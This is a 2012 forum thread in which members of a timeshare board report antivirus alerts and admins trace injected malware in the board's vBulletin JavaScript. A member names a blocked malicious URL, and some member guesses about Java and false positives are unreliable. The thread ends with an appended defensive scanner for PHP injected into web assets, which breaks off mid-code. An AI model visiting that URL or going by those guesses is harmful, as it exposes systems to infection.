> John, I thought you were _"Proudly *Microsoft* & Apple *free* with WebOS, Droid Bionic & Verizon Wireless"_. If that is the case, why would you be needing to obtain the frequent MS patches?



In my usual access I'm blessedly MS free but my laptop and work pc's are cursed with Win7 or XP.  Have to have it for testing.  Even have a Mac book but seldom turn it on.


----------



## Htoo0 (Sep 6, 2012)

Still happening for me. I switched to IE to test and it occurred there too. http://www.tugbbs.com/forums/clients...lobal.js?v=364 Threat name: Exploit Phoenix Exploit Kit (type 769) AVG, Firefox, IE and XP Pro.  Will send IP address.


----------



## Ron98GT (Sep 7, 2012)

va_traveller said:


> Just to set some information straight. I am getting the avast warning steadily still. The warning is about a JAVASCRIPT file (.js). I have been a web developer for going on 14 years, and have been a java certified developer since 1998. javascript and java have no relationship to each other except for the name. Java is a programming language that can be used to create huge applications, applets, etc. javascript is a scripting language that runs inside a browser (formerly called LiveScript). The warnings we are seeing will not be solved by "upgrading your java".
> 
> I don't want anyone to get a false sense of security by looking @ upgrading java on their computer. The issue is server side, not client side.
> 
> Greg.



Did you even open and READ any of the attached files?  You disagree with "Java", the company, that admits they have buggy code?  Java themselves stated "TROJAN" virus.  Also, there is no "Upgrade", since the latest versions are buggy, again read my whole posting and the attached links. Do a Google search.  I'm not making this stuff up, talk to Java and see what they say.

I believe you're the first to mention "JAVASCRIPT" warnings.  Others have stated "Trojan", which again relates back to Java, an Oracle company.


----------



## piper_chuck (Sep 7, 2012)

Ron98GT said:


> Did you even open and READ any of the attached files?  You disagree with "Java", the company, that admits they have buggy code?  Java themselves stated "TROJAN" virus.  Also, there is no "Upgrade", since the latest versions are buggy, again read my whole posting and the attached links. Do a Google search.  I'm not making this stuff up, talk to Java and see what they say.
> 
> I believe you're the first to mention "JAVASCRIPT" warnings.  Others have stated "Trojan", which again relates back to Java, an Oracle company.



I am getting warnings from Kaspersky about a trojan in a javascript. The point va was making is Java and javascript are unrelated. Upgrading Java won't help when the problem is in a javascript.

This is the ONLY web site I see this. I get the warnings on two computers and on Firefox and IE.

I've opened a case with Kaspersky to see what they say.


----------



## Talent312 (Sep 7, 2012)

Just got another hit from Avast!...
Infection Details
URL: http://www.tugbbs.com/forums/clientscrip...
Infection: JS:Redirector-MA [Trj]

None of the menu buttons for this post are working.


----------



## SmithOp (Sep 7, 2012)

piper_chuck said:


> I am getting warnings from Kaspersky about a trojan in a javascript. The point va was making is Java and javascript are unrelated. Upgrading Java won't help when the problem is in a javascript.
> 
> This is the ONLY web site I see this. I get the warnings on two computers and on Firefox and IE.
> 
> I've opened a case with Kaspersky to see what they say.



Exactly, the issue reported by the client AV is a script file on the server (javascript) trying to load a Trojan on client machines by exploiting a security hole in the client side java app.  Patching the client java version only blocks the payload being delivered, if it hasn't already been blocked by AV.

The report I saw indicated this site was blacklisted due to an old version of the bbs software that needs to be upgraded, I'm sure the admins will sort it out.  Until then I'll access using my iPad.


----------



## Picker57 (Sep 7, 2012)

So....is there any danger in just leaving everything as is until it's fixed?  Yes, it's annoying but can it cause any damage?  

---------Zach


----------



## theo (Sep 7, 2012)

*Trojan Horse / Virus alert no longer issued...*

I received no "threat blocked" message today from Avast upon accessing TUG. I don't claim to know how or why, but for me the problem seems to have disappeared.  Smilies are now "back" too.


----------



## Makai Guy (Sep 7, 2012)

theo said:


> I received no "threat blocked" message today from Avast upon accessing TUG. I don't claim to know how or why, but for me the problem seems to have disappeared.  Smilies are now "back" too.



Good news indeed.  
Are others still receiving the warnings?  

As you may imagine, it is very hard for me to research this, since I have never received the warnings here, so there is no way for me to know if any changes I make fix the problem.

My system:
Firefox, currently 15.0.1
AVG 2012 Free Edition, updated daily
Java version installed, ver 7 update 5 - (Edit: However, I seldom have use of Java and generally keep it DISabled in my browser.   Now updated to update 7)


----------



## Dori (Sep 7, 2012)

I am finally able to get in after two days of alerts. YaY!

Dori


----------



## Quiet Pine (Sep 7, 2012)

This morning (6 am in AZ), there hasn't been a single Kaspersky warning about a Trojan threat. It was constant pop-ups all day yesterday. A few days ago, a friend (computer pro) told me not to update Java because there were problems with the latest version. I ignored Java nagging me to update. Still got the Kaspersky warnings, though.


----------



## bogey21 (Sep 7, 2012)

No issues here this morning.

George


----------



## Passepartout (Sep 7, 2012)

I haven't tried Firefox yet today. Still using Chrome or Safari (on iPad). I'm a little gun shy after loading new AVG definitions twice yesterday only to have to do 2 system restores. 

Methinks I'll wait for a few more clean reports.

Jim


----------



## T_R_Oglodyte (Sep 7, 2012)

No warnings this morning.


----------



## TheWizz (Sep 7, 2012)

I've made no changes on my end, yet Firefox started working again today with no AVG warnings and the Quick Links menu option is back.


----------



## BM243923 (Sep 7, 2012)

No pop up warnings now, came up earlier this morning.


----------



## Passepartout (Sep 7, 2012)

OK, I'm convinced. I reinstalled a fresh AVG and am back with Firefox. It seems to be OK and all TUG features are working normally so far. I wonder what fixed it? Like Doug (Makai Guy) said- if he doesn't experience the problem, it's hard to make adjustments.

Jim


----------



## TUGBrian (Sep 7, 2012)

you can all thank doug for this one...it even stumped our server host!

Thankfully he was able to get it all working again for us.

Thank you to all of those who provided us with your information to help us identify the problem.


----------



## TheWizz (Sep 7, 2012)

TheWizz said:


> I've made no changes on my end, yet Firefox started working again today with no AVG warnings and the Quick Links menu option is back.



Buggard!  It's back!!!  

Getting the Phoenix Exploit Kit (type 769) messages again...


----------



## T_R_Oglodyte (Sep 7, 2012)

The threat alert is now reoccurring for me.

Firefox browser - all updates installed (latest update was this morning).  AVG antivirus up to date.  Java up to date.


----------



## Art (Sep 7, 2012)

*Java 7*

I have had zero problems. I am using Windows 7 with the latest up-dates, Firefox 15.0.1 and BitDefender 2012. As far as I can tell (I can't find it listed as a file anywhere), I do not have Java loaded on this machine.

However, I recently loaded Java 7 on a Windows XP machine. While I have not attempted to access TUG on that machine, I have received a variety of "you are trying to go someplace unsafe" messages from the McAfee antivirus (as provided by Road Runner) on that machine.

I am in the group that thinks the Java 7 up-date is a primary candidate as the source of the TUG access issues.

Art


----------



## Makai Guy (Sep 7, 2012)

T_R_Oglodyte said:


> The threat alert is now reoccurring for me.
> 
> Firefox browser - all updates installed (latest update was this morning).  AVG antivirus up to date.  Java up to date.





TheWizz said:


> Buggard!  It's back!!!
> 
> Getting the Phoenix Exploit Kit (type 769) messages again...



I've just tried something on this.  Please first clear your browser caches to be sure you get fresh copies of the files, and try again.


----------



## Passepartout (Sep 7, 2012)

It's back for me as well within the last hour. I have installed new AVG and definitions today, and per suggestion have cleared the browser cache. Same Phoenix Exploit Kit Type 769. GRRRR!

Jim


----------



## pittle (Sep 7, 2012)

We have gotten warnings using Avast on IE9, Firefox, and Chrome off and on for the past 2 days.


----------



## Makai Guy (Sep 7, 2012)

Makai Guy said:


> I've just tried something on this.


Well, I guess THAT wasn't it ...


----------



## T_R_Oglodyte (Sep 7, 2012)

Makai Guy said:


> T_R_Oglodyte said:
> 
> 
> > The threat alert is now reoccurring for me.
> ...



Cleared cache.  Still getting message.


----------



## Tropical lady (Sep 7, 2012)

*count me in.....*

Kaspersky alerts constantly.  Avast on IE9.  Very annoying!!


----------



## Picker57 (Sep 7, 2012)

Passepartout said:


> It's back for me as well within the last hour. I have installed new AVG and definitions today, and per suggestion have cleared the browser cache. Same Phoenix Exploit Kit Type 769. GRRRR!
> 
> Jim



Yep, it's back on mine as well - 3 times in the past couple of minutes -and that same message.  It was clear for a few hours earlier. WEIRD that it's picking on TUG.  Is it happening to threads other than 'Lounge'?  

---------------Zach


----------



## timeos2 (Sep 7, 2012)

Art said:


> I have had zero problems. I am using Windows 7 with the latest up-dates, Firefox 15.0.1 and BitDefender 2012. As far as I can tell (I can't find it listed as a file anywhere), I do not have Java loaded on this machine.
> 
> However, I recently loaded Java 7 on a Windows XP machine. While I have not attempted to access TUG on that machine, I have received a variety of "you are trying to go someplace unsafe" messages from the McAfee antivirus (as provided by Road Runner) on that machine.
> ...



It seems blaming the Java update is wrong as many have it &  have no problems (I'm one).  The fact remains only certain anti-virus implementations are reacting by blocking. It does seem to be a false positive being triggered by other issues in the specific client.  

Some have rolled back or forward to change the java version & changed nothing.  Keep looking.


----------



## dioxide45 (Sep 7, 2012)

Picker57 said:


> So....is there any danger in just leaving everything as is until it's fixed?  Yes, it's annoying but can it cause any damage?
> 
> ---------Zach



Well, if you were like me you would actually have the Trojan run and try to get you to click on a program to try to get you to "scan your computer". My guess is that the program would find a bogus virus and try to get you to pay to remove it. When you learn that the program is in fact the problem, you could probably pay even more to get it removed. However once sucked in, you are toast.


----------



## TUGBrian (Sep 7, 2012)

id suggest anyone (even those without the problem) use malwarebytes antimalware software...its quite effective at finding nonsense and removing it on your computer.

as we have seen, not all virus scanners even detect a problem!

its free here

http://fileforum.betanews.com/detail/Malwarebytes-AntiMalware/1186760019/1


----------



## Picker57 (Sep 7, 2012)

Picker57 said:


> Is it happening to threads other than 'Lounge'?
> 
> ---------------Zach




Damn...just found the answer: AFFIRMATIVE ! Will do an AVG full body scan (oh wait....that's at the airport) and download the malware thingy.

----------Zach


----------



## TUGBrian (Sep 7, 2012)

quick poll.

how many of you (if any at all) are getting this by going through a bookmark or a link to the forums.

for those of you that do, and get the message...open up a NEW browser window and just type in tugbbs.com/forums

please tell me if you get the virus warning


----------



## Phill12 (Sep 7, 2012)

I have been getting same notices! Just coming to this posting my protection has blocked eight Trojan warnings!

Brian, I went back and returned to TUG as you said and it made no difference! Every move I make gives me warning of Trojan blocked!

 PHIL


----------



## TUGBrian (Sep 7, 2012)

were you browsing to TUG each time using a link/bookmark?  or did you type tugbbs.com/forums into a fresh browser?


----------



## TUGBrian (Sep 7, 2012)

anyone still getting the alerts at all now?


----------



## Passepartout (Sep 7, 2012)

I downloaded the Malwarebytes, scanned the computer, restarted, opened TUG in a new window. BANG, virus warning is back. 

I'm feeling that users are being asked to do untried, untested moves when with all due respect, *I feel that the problem has something to do with TUGBBS- not members' computers. It doesn't seem to affect other parts of TUG, like classifieds, reviews. Just BBS.*

Oh, I tried Safari as well as Firefox and Chrome. Chrome is the only one that seems unaffected.

Meanwhile back to Chrome for my BBSing til this is figured out.

Jim


----------



## TUGBrian (Sep 7, 2012)

i suggested malwarebytes as a very useful tool to clean computers that might already be infected, not to cure this problem.

(also note that classifieds/reviews/etc are on completely different servers)


----------



## TUGBrian (Sep 7, 2012)

we replaced the global.js file at approx 6:43pm...did you get the message after that Jim?


----------



## #1 Cowboys Fan (Sep 7, 2012)

TUGBrian said:


> anyone still getting the alerts at all now?



Brian,

This 'computer lingo' is WAAAAY above my head,

BUT, I just tried to type in

www.tug2.net

then I went to TUG Forums, and got the
AVG has BLOCKED this threat message.

(Just trying to add info, to solve the problem)

Pat


----------



## Makai Guy (Sep 7, 2012)

Tried something else (Brian, the upload we just emailed about).   Please clear caches, try again, and report back.  (Edit: I see Brian already posted about this.)


----------



## TUGBrian (Sep 7, 2012)

just to confirm...you typed in tug2.net   not tugbbs.com and got the message?


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> we replaced the global.js file at approx 6:43pm...did you get the message after that Jim?



Yes. At 6:49, just seconds ago.


----------



## TUGBrian (Sep 7, 2012)

do you get the same message going to tug2.net?


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> do you get the same message going to tug2.net?



No, it seems to just affect the BBS. Reviews, classifieds, all that other stuff in the red stripe seem clean.


----------



## TUGBrian (Sep 7, 2012)

ok...if tug home, advice, and faq all work...its definitely the forums.

marketplace and reviews are on a different server.


----------



## T_R_Oglodyte (Sep 7, 2012)

Just cleared cache. Still getting the message on the BBS.  All tug2.net addresses checked were fine.


----------



## TUGBrian (Sep 7, 2012)

id give anything to be able to reproduce this error on my machine...i hate asking you guys to keep doing all this.


----------



## Passepartout (Sep 7, 2012)

That might help- just being able to identify the server that's bugged.


----------



## Htoo0 (Sep 7, 2012)

Still here for me too. But I do appreciate your efforts. BTW, the 'smilies' no longer work for me since this started. Also, I downloaded the latest version of Firefox yesterday but I get it in IE as well.


----------



## T_R_Oglodyte (Sep 7, 2012)

Htoo0 said:


> Still here for me too. But I do appreciate your efforts. BTW, the 'smilies' no longer work for me since this started.



The multi-quote option for posting replies also does not work. I suspect there are a lot of similar functionalities that are being affected.


----------



## dioxide45 (Sep 7, 2012)

Still no issues on Chrome. Smilies work fine though I have never had a quicklink button. Chrome doesn't work the same, I guess it doesn't support Java Script the same way other browsers do?


----------



## TUGBrian (Sep 7, 2012)

ill admit im completely baffled as to why it seems to:

1. only impact some of you (despite same browsers)
2. doesnt show up on my computer at all despite me running all 3 browsers, and avg
3. the quick links/smiles/yadda arent broken for everyone.

none of this makes sense at all.


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> Why it seems to:
> 1. only impact some of you
> 
> none of this makes sense at all.



We're just *special*


----------



## Htoo0 (Sep 7, 2012)

Probably no help but today AVG has a show details function which is now working. It states:  Process name: C:\Program Files\MozillaFireFox\firefox.exe and Process ID: 152 while in firefox. For IE it states Process name: C:\Program Files\Internet Explorer\iexplore.exe and Process ID: 2880 although I just hit details again and it changed the process ID to 2252 now that I'm back in FF.


----------



## TUGBrian (Sep 7, 2012)

thats ok...thats something local to your computer.


----------



## va_traveller (Sep 7, 2012)

Ron98GT said:


> Did you even open and READ any of the attached files?  You disagree with "Java", the company, that admits they have buggy code?  Java themselves stated "TROJAN" virus.  Also, there is no "Upgrade", since the latest versions are buggy, again read my whole posting and the attached links. Do a Google search.  I'm not making this stuff up, talk to Java and see what they say.
> 
> I believe you're the first to mention "JAVASCRIPT" warnings.  Others have stated "Trojan", which again relates back to Java, an Oracle company.



Sir, I am not trying to pick a fight with you, but the issues you found were with trojan APPLETs that are downloaded into the java cache and executed without the user's knowledge.

A "Trojan" is a program in ~any~ language that pretends to do one thing, but does another. There can be (as you found) trojans in java, trojans in javascript (which is the case here), and trojans in many many forms. (http://en.wikipedia.org/wiki/Trojan_horse_(computing))

The issue here, while similar in that it's a trojan, is not java based. The cases you found are indeed an issue, if you were downloading an applet that was written by a miscreant 12 year old. In this case, the issue is a javascript file, probably written by a miscreant 10 year old.


----------



## va_traveller (Sep 7, 2012)

Since we are keeping track, today AVAST blocked something different.

avast! blocked the virus:
http://yeare.pro/nwuvgyzxwwipadc/

That's all I got. I would check any 3rd party advertising that may appear. Sometimes these can be injected with crap.

Greg


----------



## va_traveller (Sep 7, 2012)

TUGBrian said:


> quick poll.
> 
> how many of you (if any at all) are getting this by going through a bookmark or a link to the forums.
> 
> ...



Opened it in IE (which I rarely use) and got the same warning I posted above. S


----------



## dioxide45 (Sep 7, 2012)

va_traveller said:


> Since we are keeping track, today AVAST blocked something different.
> 
> avast! blocked the virus:
> http://yeare.pro/nwuvgyzxwwipadc/
> ...



I don't think it is advertising. Something I have noticed about the TUG forums is that they have no advertising. FlyerTalk a few weeks ago was having a problem with some ads prompting a popup box about viruses and to run a scan. All that was available was an okay button. I am sure that clicking the okay button would have installed or run some nasty stuff. Clicking the red X didn't help, the only way out was to kill IE through Task Manager. That issue on FlyerTalk is why I switched to Chrome.

I don't know why the TUG forums don't have ads, I have only seen the ads in the TUG2.net site.


----------



## TUGBrian (Sep 7, 2012)

is anyone having the virus warning after 11:30pm eastern?


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> is anyone having the virus warning after 11:30pm eastern?



Yup. Still doing it at 11:42


----------



## easyrider (Sep 7, 2012)

T_R_Oglodyte said:


> The multi-quote option for posting replies also does not work. I suspect there are a lot of similar functionalities that are being affected.





TUGBrian said:


> ill admit im completely baffled as to why it seems to:
> 
> 1. only impact some of you (despite same browsers)
> 2. doesnt show up on my computer at all despite me running all 3 browsers, and avg
> ...





Passepartout said:


> We're just *special*



 :annoyed: :whoopie: :hysterical: 







ITS STILL WORKING FOR ME


I did lose spellcheck a few months ago.  

Bill 

SQUID


----------



## Htoo0 (Sep 8, 2012)

I'm still getting it and I think it's 11:54 eastern. (10:54 Central) I've updated and ran MalwareBytes, Spybot S&D, AVG, and Firefox. No problems found. Cleared cache and ran a registry cleaner as well. Not sure what else I can do at this point. This is my laptop and I get the message both at work and home so I'm guessing different IP's etc. Ah well, maybe I'll fire up the old desktop and see what happens. Thanks again for all the time being dedicated to solving a problem for just a few of us.


----------



## MichaelColey (Sep 8, 2012)

I'm still getting the warning as well.  I cleared my Temporary Internet Files, to no avail.


----------



## bccash63 (Sep 8, 2012)

I am still getting it. dawn


----------



## pammex (Sep 8, 2012)

yes I am getting it as well....using Firefox...and appears with everything you do, go from one thread to another etc...no smileys...working...


----------



## Htoo0 (Sep 8, 2012)

Well, it's not on my desktop. Vista Ultimate, AVG, Firefox, and it updated AVG, Adobe and Java. But still no problem.:whoopie:


----------



## piper_chuck (Sep 8, 2012)

Still getting it here. Tried clearing Firefox cache, deleted all cookies containing tugbbs and restarted Firefox. Still getting. Installed Malwarebytes, nothing found. Opened an IE window, typed tugbbs.com and got the warning.


----------



## piper_chuck (Sep 8, 2012)

Found a way to make the warnings go away in Firefox and IE. 

For Firefox go to Tools->Options. Click on the Content tab and uncheck the Enable JavaScript box. 

For IE follow the directions listed here: http://browsers.about.com/od/internetexplorertutorials/ss/disable-javascript-ie9_6.htm

I do not want to run this way long term, but it does provide relief for people until the source of the problem is identified and corrected.

Edit: Discovered yahoo mail needs javascript to work correctly. Probably lots of other sites too.


----------



## va_traveller (Sep 8, 2012)

piper_chuck said:


> Found a way to make the warnings go away in Firefox and IE.
> 
> For Firefox go to Tools->Options. Click on the Content tab and uncheck the Enable JavaScript box.
> 
> ...





Most sites these days are so heavily dependent on javascript, your online experience would be horrible. This is kinda like going hunting with an empty gun...you can see the animals, point the gun, buuuuuuuuuut...


----------



## BM243923 (Sep 8, 2012)

It's back again on my laptop that uses Vista.

Has never been a problem on my Regular computer that uses Windows 7


----------



## TUGBrian (Sep 8, 2012)

can anyone else whos getting it regularly confirm that disabling javascript (per the instructions above) makes it go away on your local computer?

(note you can turn it back on, im just fishing for a common theme here)


----------



## Passepartout (Sep 8, 2012)

I disabled JavaScript and the virus warning did not come back, but neither did any formatting or smilies or QuickLinks.

Meanwhile back to Chrome.

Jim


----------



## Passepartout (Sep 8, 2012)

Brian, The stuff going on here and the 'Strange Happenings' in this thread http://tugbbs.com/forums/showthread.php?t=178356 are linked. Maybe the threads should be merged? 

There seems to be new info including a .exe file name contained in the last post in the above thread. 

Hope you find the culprit soon. It seems there are more affected machines.

Jim


----------



## T_R_Oglodyte (Sep 8, 2012)

TUGBrian said:


> can anyone else whos getting it regularly confirm that disabling javascript (per the instructions above) makes it go away on your local computer?
> 
> (note you can turn it back on, im just fishing for a common theme here)


Disabling JavaScript makes the warning go away.  (It also eliminates some of the site functionalities - in addition to no smilies, Quick Links doesn't work, and clicking the multi-quote feature has the same effect as clicking the Quote button (i.e., it immediately opens a Quote reply window).)


----------



## Carolyn (Sep 8, 2012)

I also had an inquiry about a timeshare I am trying to rent go to my Gmail spam folder. The prospective renter also had Gmail. This happened on 8/31. Just found it last night. May have missed out on a renter


----------



## Talent312 (Sep 8, 2012)

I'm not getting any more warnings and have full functionality at home.

But my office 'puter using a stale version of Symantic did not intercept "Live Security Platform" which seems to have installed itself the moment I opened TUG.

I should'a known better, and now I have to take it to my IT-Admin to clean.


----------



## piper_chuck (Sep 8, 2012)

Talent312 said:


> I'm not getting any more warnings and have full functionality at home.
> 
> But my office 'puter using a stale version of Symantec did not intercept "Live Security Platform" which seems to have installed itself the moment I opened TUG.
> 
> I should'a known better, and now I have to take it to my IT-Admin to clean.



Sounds like the warning many of us are getting is not a false positive.


----------



## SmithOp (Sep 8, 2012)

piper_chuck said:


> Sounds like the warning many of us are getting is not a false positive.



This is not to be taken lightly if there is a payload being distributed by a rogue javascript on the tug bbs server.  Until now the discussion centered on false positive by av scanner updates or java updates.  I can clear up a few questions about who may get infected, I hope Talent can confirm based on his company machine being compromised that it was Win XP or Vista.

- Chrome has a feature called sandbox that blocks JavaScript injection and execution, that's why no warnings.
- Windows 7 has better security and blocks it if kept up to date.
- Win XP or Vista using IE or Firefox with lax AV are vulnerable. 
- if your AV blocks all the scripts here, it's just the annoyance of no formatting tools and shortcuts loading, be thankful you didn't get the virus payload.


----------



## T_R_Oglodyte (Sep 8, 2012)

Carolyn said:


> I also had an inquiry about a timeshare I am trying to rent go to my Gmail spam folder. The prospective renter also had Gmail. This happened on 8/31. Just found it last night. May have missed out on a renter.



I don't think that has anything to do with the security issue being discussed here.  That is strictly an issue involving the spam filter settings on *your* G-mail account. Also, the TUG Marketplace is hosted on a different server, which is not involved with the security issues.

*****

Bottom line - if you want to make sure messages like this don't get routed to your spam folder, you need to change your e-mail spam settings to be less restrictive.


----------



## dioxide45 (Sep 8, 2012)

piper_chuck said:


> Sounds like the warning many of us are getting is not a false positive.



Correct, your AV is blocking the file from being delivered. Others, myself included, have reported having a file downloaded to their system. All seems clean now though as I was able to delete the files and ran a complete system scan which appears to have cleaned everything up.


----------



## dioxide45 (Sep 8, 2012)

SmithOp said:


> - Win XP or Vista using IE or Firefox with lax AV are vulnerable.



Not sure it is necessarily lax AV. Some AV programs are just better than others and some are better at certain threats than others. None are perfect.


----------



## dioxide45 (Sep 8, 2012)

Carolyn said:


> I also had an inquiry about a timeshare I am trying to rent go to my Gmail spam folder. The prospective renter also had Gmail. This happened on 8/31. Just found it last night. May have missed out on a renter.



I don't know how TUG e-mails are delivered for marketplace ads. Does it appear to come from the renter's email address, or do they come from a generic TUG address? If it is a generic address, add that e-mail address to your contact list and it should prevent them from being delivered to your junk box.


----------



## Htoo0 (Sep 8, 2012)

Disabled javascript with Firefox and the warning was gone. Turned it back on and I have the warning.


----------



## Talent312 (Sep 8, 2012)

SmithOp said:


> I can clear up a few questions about who may get infected, I hope Talent can confirm based on his company machine being compromised that it was Win XP or Vista.



Yep... The office 'puter runs Win XP Pro.
It happened yesterday ~ 5PM, after our IT guy had left for the day.
This thing is a real tuff nut.


----------



## #1 Cowboys Fan (Sep 8, 2012)

I'm not getting those 'THREAT' warnings anymore from AVG---but perhaps I need some TUGgers advice, if things still aren't OKAY  ??

Pat


----------



## Passepartout (Sep 8, 2012)

I was hoping you were onto something there Pat, but my AVG is still showing the threat and clearing it. I'm still using Chrome since I don't want the hassle.

I'm waiting for someone to decide it's a local problem and wipes their hard drive and reinstalls the whole mess. I'm not going to be the first.

Jim


----------



## dioxide45 (Sep 8, 2012)

Passepartout said:


> I was hoping you were onto something there Pat, but my AVG is still showing the threat and clearing it. I'm still using Chrome since I don't want the hassle.
> 
> I'm waiting for someone to decide it's a local problem and wipes their hard drive and reinstalls the whole mess. I'm not going to be the first.
> 
> Jim



I don't think it is a local system issue as someone alluded to. It is affecting too many people and it only seems to be happening with TUG. There is a problem with the JS on TUG or there is something in this version of vBulletin that has been exploited.


----------



## T_R_Oglodyte (Sep 8, 2012)

#1 Cowboys Fan said:


> I'm not getting those 'THREAT' warnings anymore from AVG---but perhaps I need some TUGgers advice, if things still aren't OKAY  ??
> 
> Pat


I very strongly suspect the site has been hacked with the Phoenix Exploit Kit lurking somewhere in the vBulletin JavaScript.

If you were getting alerts from AVG, but you no longer are *and* you haven't disabled JavaScript (see discussion upthread to figure out whether you have JavaScript disabled) or switched to the Chrome browser, I would be worried.  The code is still lurking in the site and should be setting off your AVG.


----------



## T_R_Oglodyte (Sep 8, 2012)

dioxide45 said:


> I don't think it is a local system issue as someone alluded to. It is affecting too many people and it only seems to be happening with TUG. There is a problem with the JS on TUG or there is something in this version of vBulletin that has been exploited.



My AVG identifies vbulletin_global.js as the offending file.  I'm not catching the warning at other vBulletin sites, just TUG.  So I suspect it's TUG only and I think it likely the TUGBBS.com server has been compromised.


----------



## dioxide45 (Sep 8, 2012)

T_R_Oglodyte said:


> My AVG identifies vbulletin_global.js as the offending file.  I'm not catching the warning at other vBulletin sites, just TUG.  So I suspect it's TUG only and I think it likely the TUGBBS.com server has been compromised.



TUG is using a very old version of vBulletin. One that may no longer be supported by vBulletin. Perhaps there is a security issue that has been exploited somehow but is not an issue with newer versions.

I find it rather concerning that the admin has not been able to duplicate this issue and no one on their server side has either. Without duplicating it, it makes it very hard to diagnose.


----------



## Makai Guy (Sep 8, 2012)

dioxide45 said:


> TUG is using a very old version of vBulletin. .... Perhaps there is a security issue that has been exploited somehow but is not an issue with newer versions.


I think this is highly likely. The problem in updating is that we are running a highly modified version which makes adapting all our modifications to a new version very difficult.



> I find it rather concerning that the admin has not been able to duplicate this issue and no one on their server side has either. Without duplicating it, it makes it very hard to diagnose.


Pretty disconcerting here, too, believe me.  I get none of the warnings on either computer.


----------



## TUGBrian (Sep 8, 2012)

I've even tried all 3 computers here.

winxp running ie9/firefox and chrome
winxp running ie8
win2k3 running ie8

all running avg

lkajsdkfjasdf


----------



## Passepartout (Sep 8, 2012)

Getting kinda used to Chrome. That'll drive the step son nutz! The big G is sort of persona non grata around his place since he lives in Redmond and works for Bill. He tolerates me using Firefox, but I might have to hide the laptop with those magazines with the pictures I shouldn't be looking at (airplanes and mud races and fly fishing).

Boy, the sacrifices I endure for TUG! 

Jim


----------



## T_R_Oglodyte (Sep 8, 2012)

Makai Guy said:


> I think this is highly likely. The problem in updating is that we are running a highly modified version which makes adapting all our modifications to a new version very difficult.
> 
> 
> Pretty disconcerting here, too, believe me.  I get none of the warnings on either computer.



Reading about the reported behavior of the Phoenix Exploit Kit, what people are reporting here matches pretty closely the described characteristics of the Phoenix Exploit. That, plus a credible report of someone having actually received a payload, strongly suggests to me that the code has been corrupted/hacked and these aren't phantom positives.


----------



## Makai Guy (Sep 8, 2012)

T_R_Oglodyte said:


> Reading about the reported behavior of the Phoenix Exploit Kit, what people are reporting here matches pretty closely the described characteristics of the Phoenix Exploit. That, plus a credible report of someone having actually received a payload, strongly suggests to me that the code has been corrupted/hacked and these aren't phantom positives.


I don't think they're phantom positives either, I just don't get them here.

Everyone please continue to report your complete warning messages.  Sometimes they will contain a hint that can be helpful in tracking this stuff down, especially if they change from previous reports.


----------



## T_R_Oglodyte (Sep 8, 2012)

Makai Guy said:


> I don't think they're phantom positives either, I just don't get them here.
> 
> Everyone please continue to report your complete warning messages.  Sometimes they will contain a hint that can be helpful in tracking this stuff down, especially if they change from previous reports.


Here is a screen snip with the AVG warning that I get:


----------



## Makai Guy (Sep 8, 2012)

Thanks, Steve.  FWIW, we've been all over the vbulletin_global.js file six ways from Sunday.   We have even replaced the file with a copy from an untouched virgin download of the full vBulletin 3.6.4 package from Jelsoft, yet the same notice prevails.


----------



## Passepartout (Sep 8, 2012)

I get the identical message (I'd show you if I knew how to do a screen shot) and there is nothing relative in the 'More Info' or 'Details.'

Jim


----------



## MichaelColey (Sep 8, 2012)

I disabled AVG and turned on Fiddler (a packet analyzer), then loaded a page on TUG.  I looked at the results I got back when vbulletin_global.js was requested, and I noticed the following additional code appended at the bottom of the file:



> <br />
> <b>Warning</b>: include(vbulletin_css/styles.css) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in <b>/home/tugbbsc/public_html/forums/clientscript/vbulletin_global.js</b> on line <b>1730</b><br />
> <br />
> <b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening 'vbulletin_css/styles.css' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/tugbbsc/public_html/forums/clientscript/vbulletin_global.js</b> on line <b>1730</b><br />


 
To me, it looks like a misconfiguration somewhere, rather than a virus.


----------



## Makai Guy (Sep 8, 2012)

MichaelColey said:


> I disabled AVG and turned on Fiddler (a packet analyzer), then loaded a page on TUG.  I looked at the results I got back when vbulletin_global.js was requested, and I noticed the following additional code appended at the bottom of the file:
> 
> 
> 
> To me, it looks like a misconfiguration somewhere, rather than a virus.



HA!  I just stumbled on the styles.css file via another means.  It is definitely an infusion of malware, similar to stuff we've found in the past, and I've disabled it.  This error message tells us whatever is trying to call it now can't find it.  Now to analyze your warning and see where it leads us ..


----------
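The check from the two posts above, as an added example that is not part of the original thread: it pulls PHP warning markup out of a served .js body (PHP naming the .js file as the failing script shows the asset is being run through the interpreter) and scans a webroot for PHP tags in static assets and for .htaccess lines that hand files to PHP. The function names, the constructed sample body and the choice of directives to flag are assumptions of this example, not details of the TUG server.

```python
import os
import re
import tempfile

# Shape of PHP's HTML-formatted warnings, as in the output quoted in the post above.
PHP_MSG = re.compile(
    r"<b>(?P<level>Warning|Notice|Fatal error|Parse error)</b>:\s*(?P<msg>.*?)"
    r" in <b>(?P<file>[^<]+)</b> on line <b>(?P<line>\d+)</b>", re.S)
INCLUDE_ARG = re.compile(r"\b(?:include|require)(?:_once)?\(([^)]+)\)")
STATIC_EXT = (".js", ".css")
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.I)
# Assumption: Apache directives that can hand a file to PHP or attach PHP to every request.
HTACCESS_RISK = re.compile(
    r"^\s*(?:(?:AddHandler|AddType|SetHandler|ForceType)\b.*php"
    r"|php_value\s+auto_(?:prepend|append)_file\b)", re.I)


def php_warnings_in_asset(body):
    """Return PHP diagnostics found in a response body served as a static asset."""
    hits = []
    for m in PHP_MSG.finditer(body):
        target = INCLUDE_ARG.search(m.group("msg"))
        hits.append({
            "level": m.group("level"),
            "file": m.group("file"),
            "line": int(m.group("line")),
            "include_target": target.group(1) if target else None,
            # PHP reporting a .js/.css file as the failing script means the
            # server ran that asset through the PHP interpreter.
            "asset_executed_as_php": m.group("file").lower().endswith(STATIC_EXT),
        })
    return hits


def scan_webroot(root):
    """List (path, line_no, reason) for PHP tags in assets and risky .htaccess lines."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                lines = fh.read().splitlines()
            for no, raw in enumerate(lines, 1):
                if name.lower().endswith(STATIC_EXT) and PHP_OPEN_TAG.search(raw):
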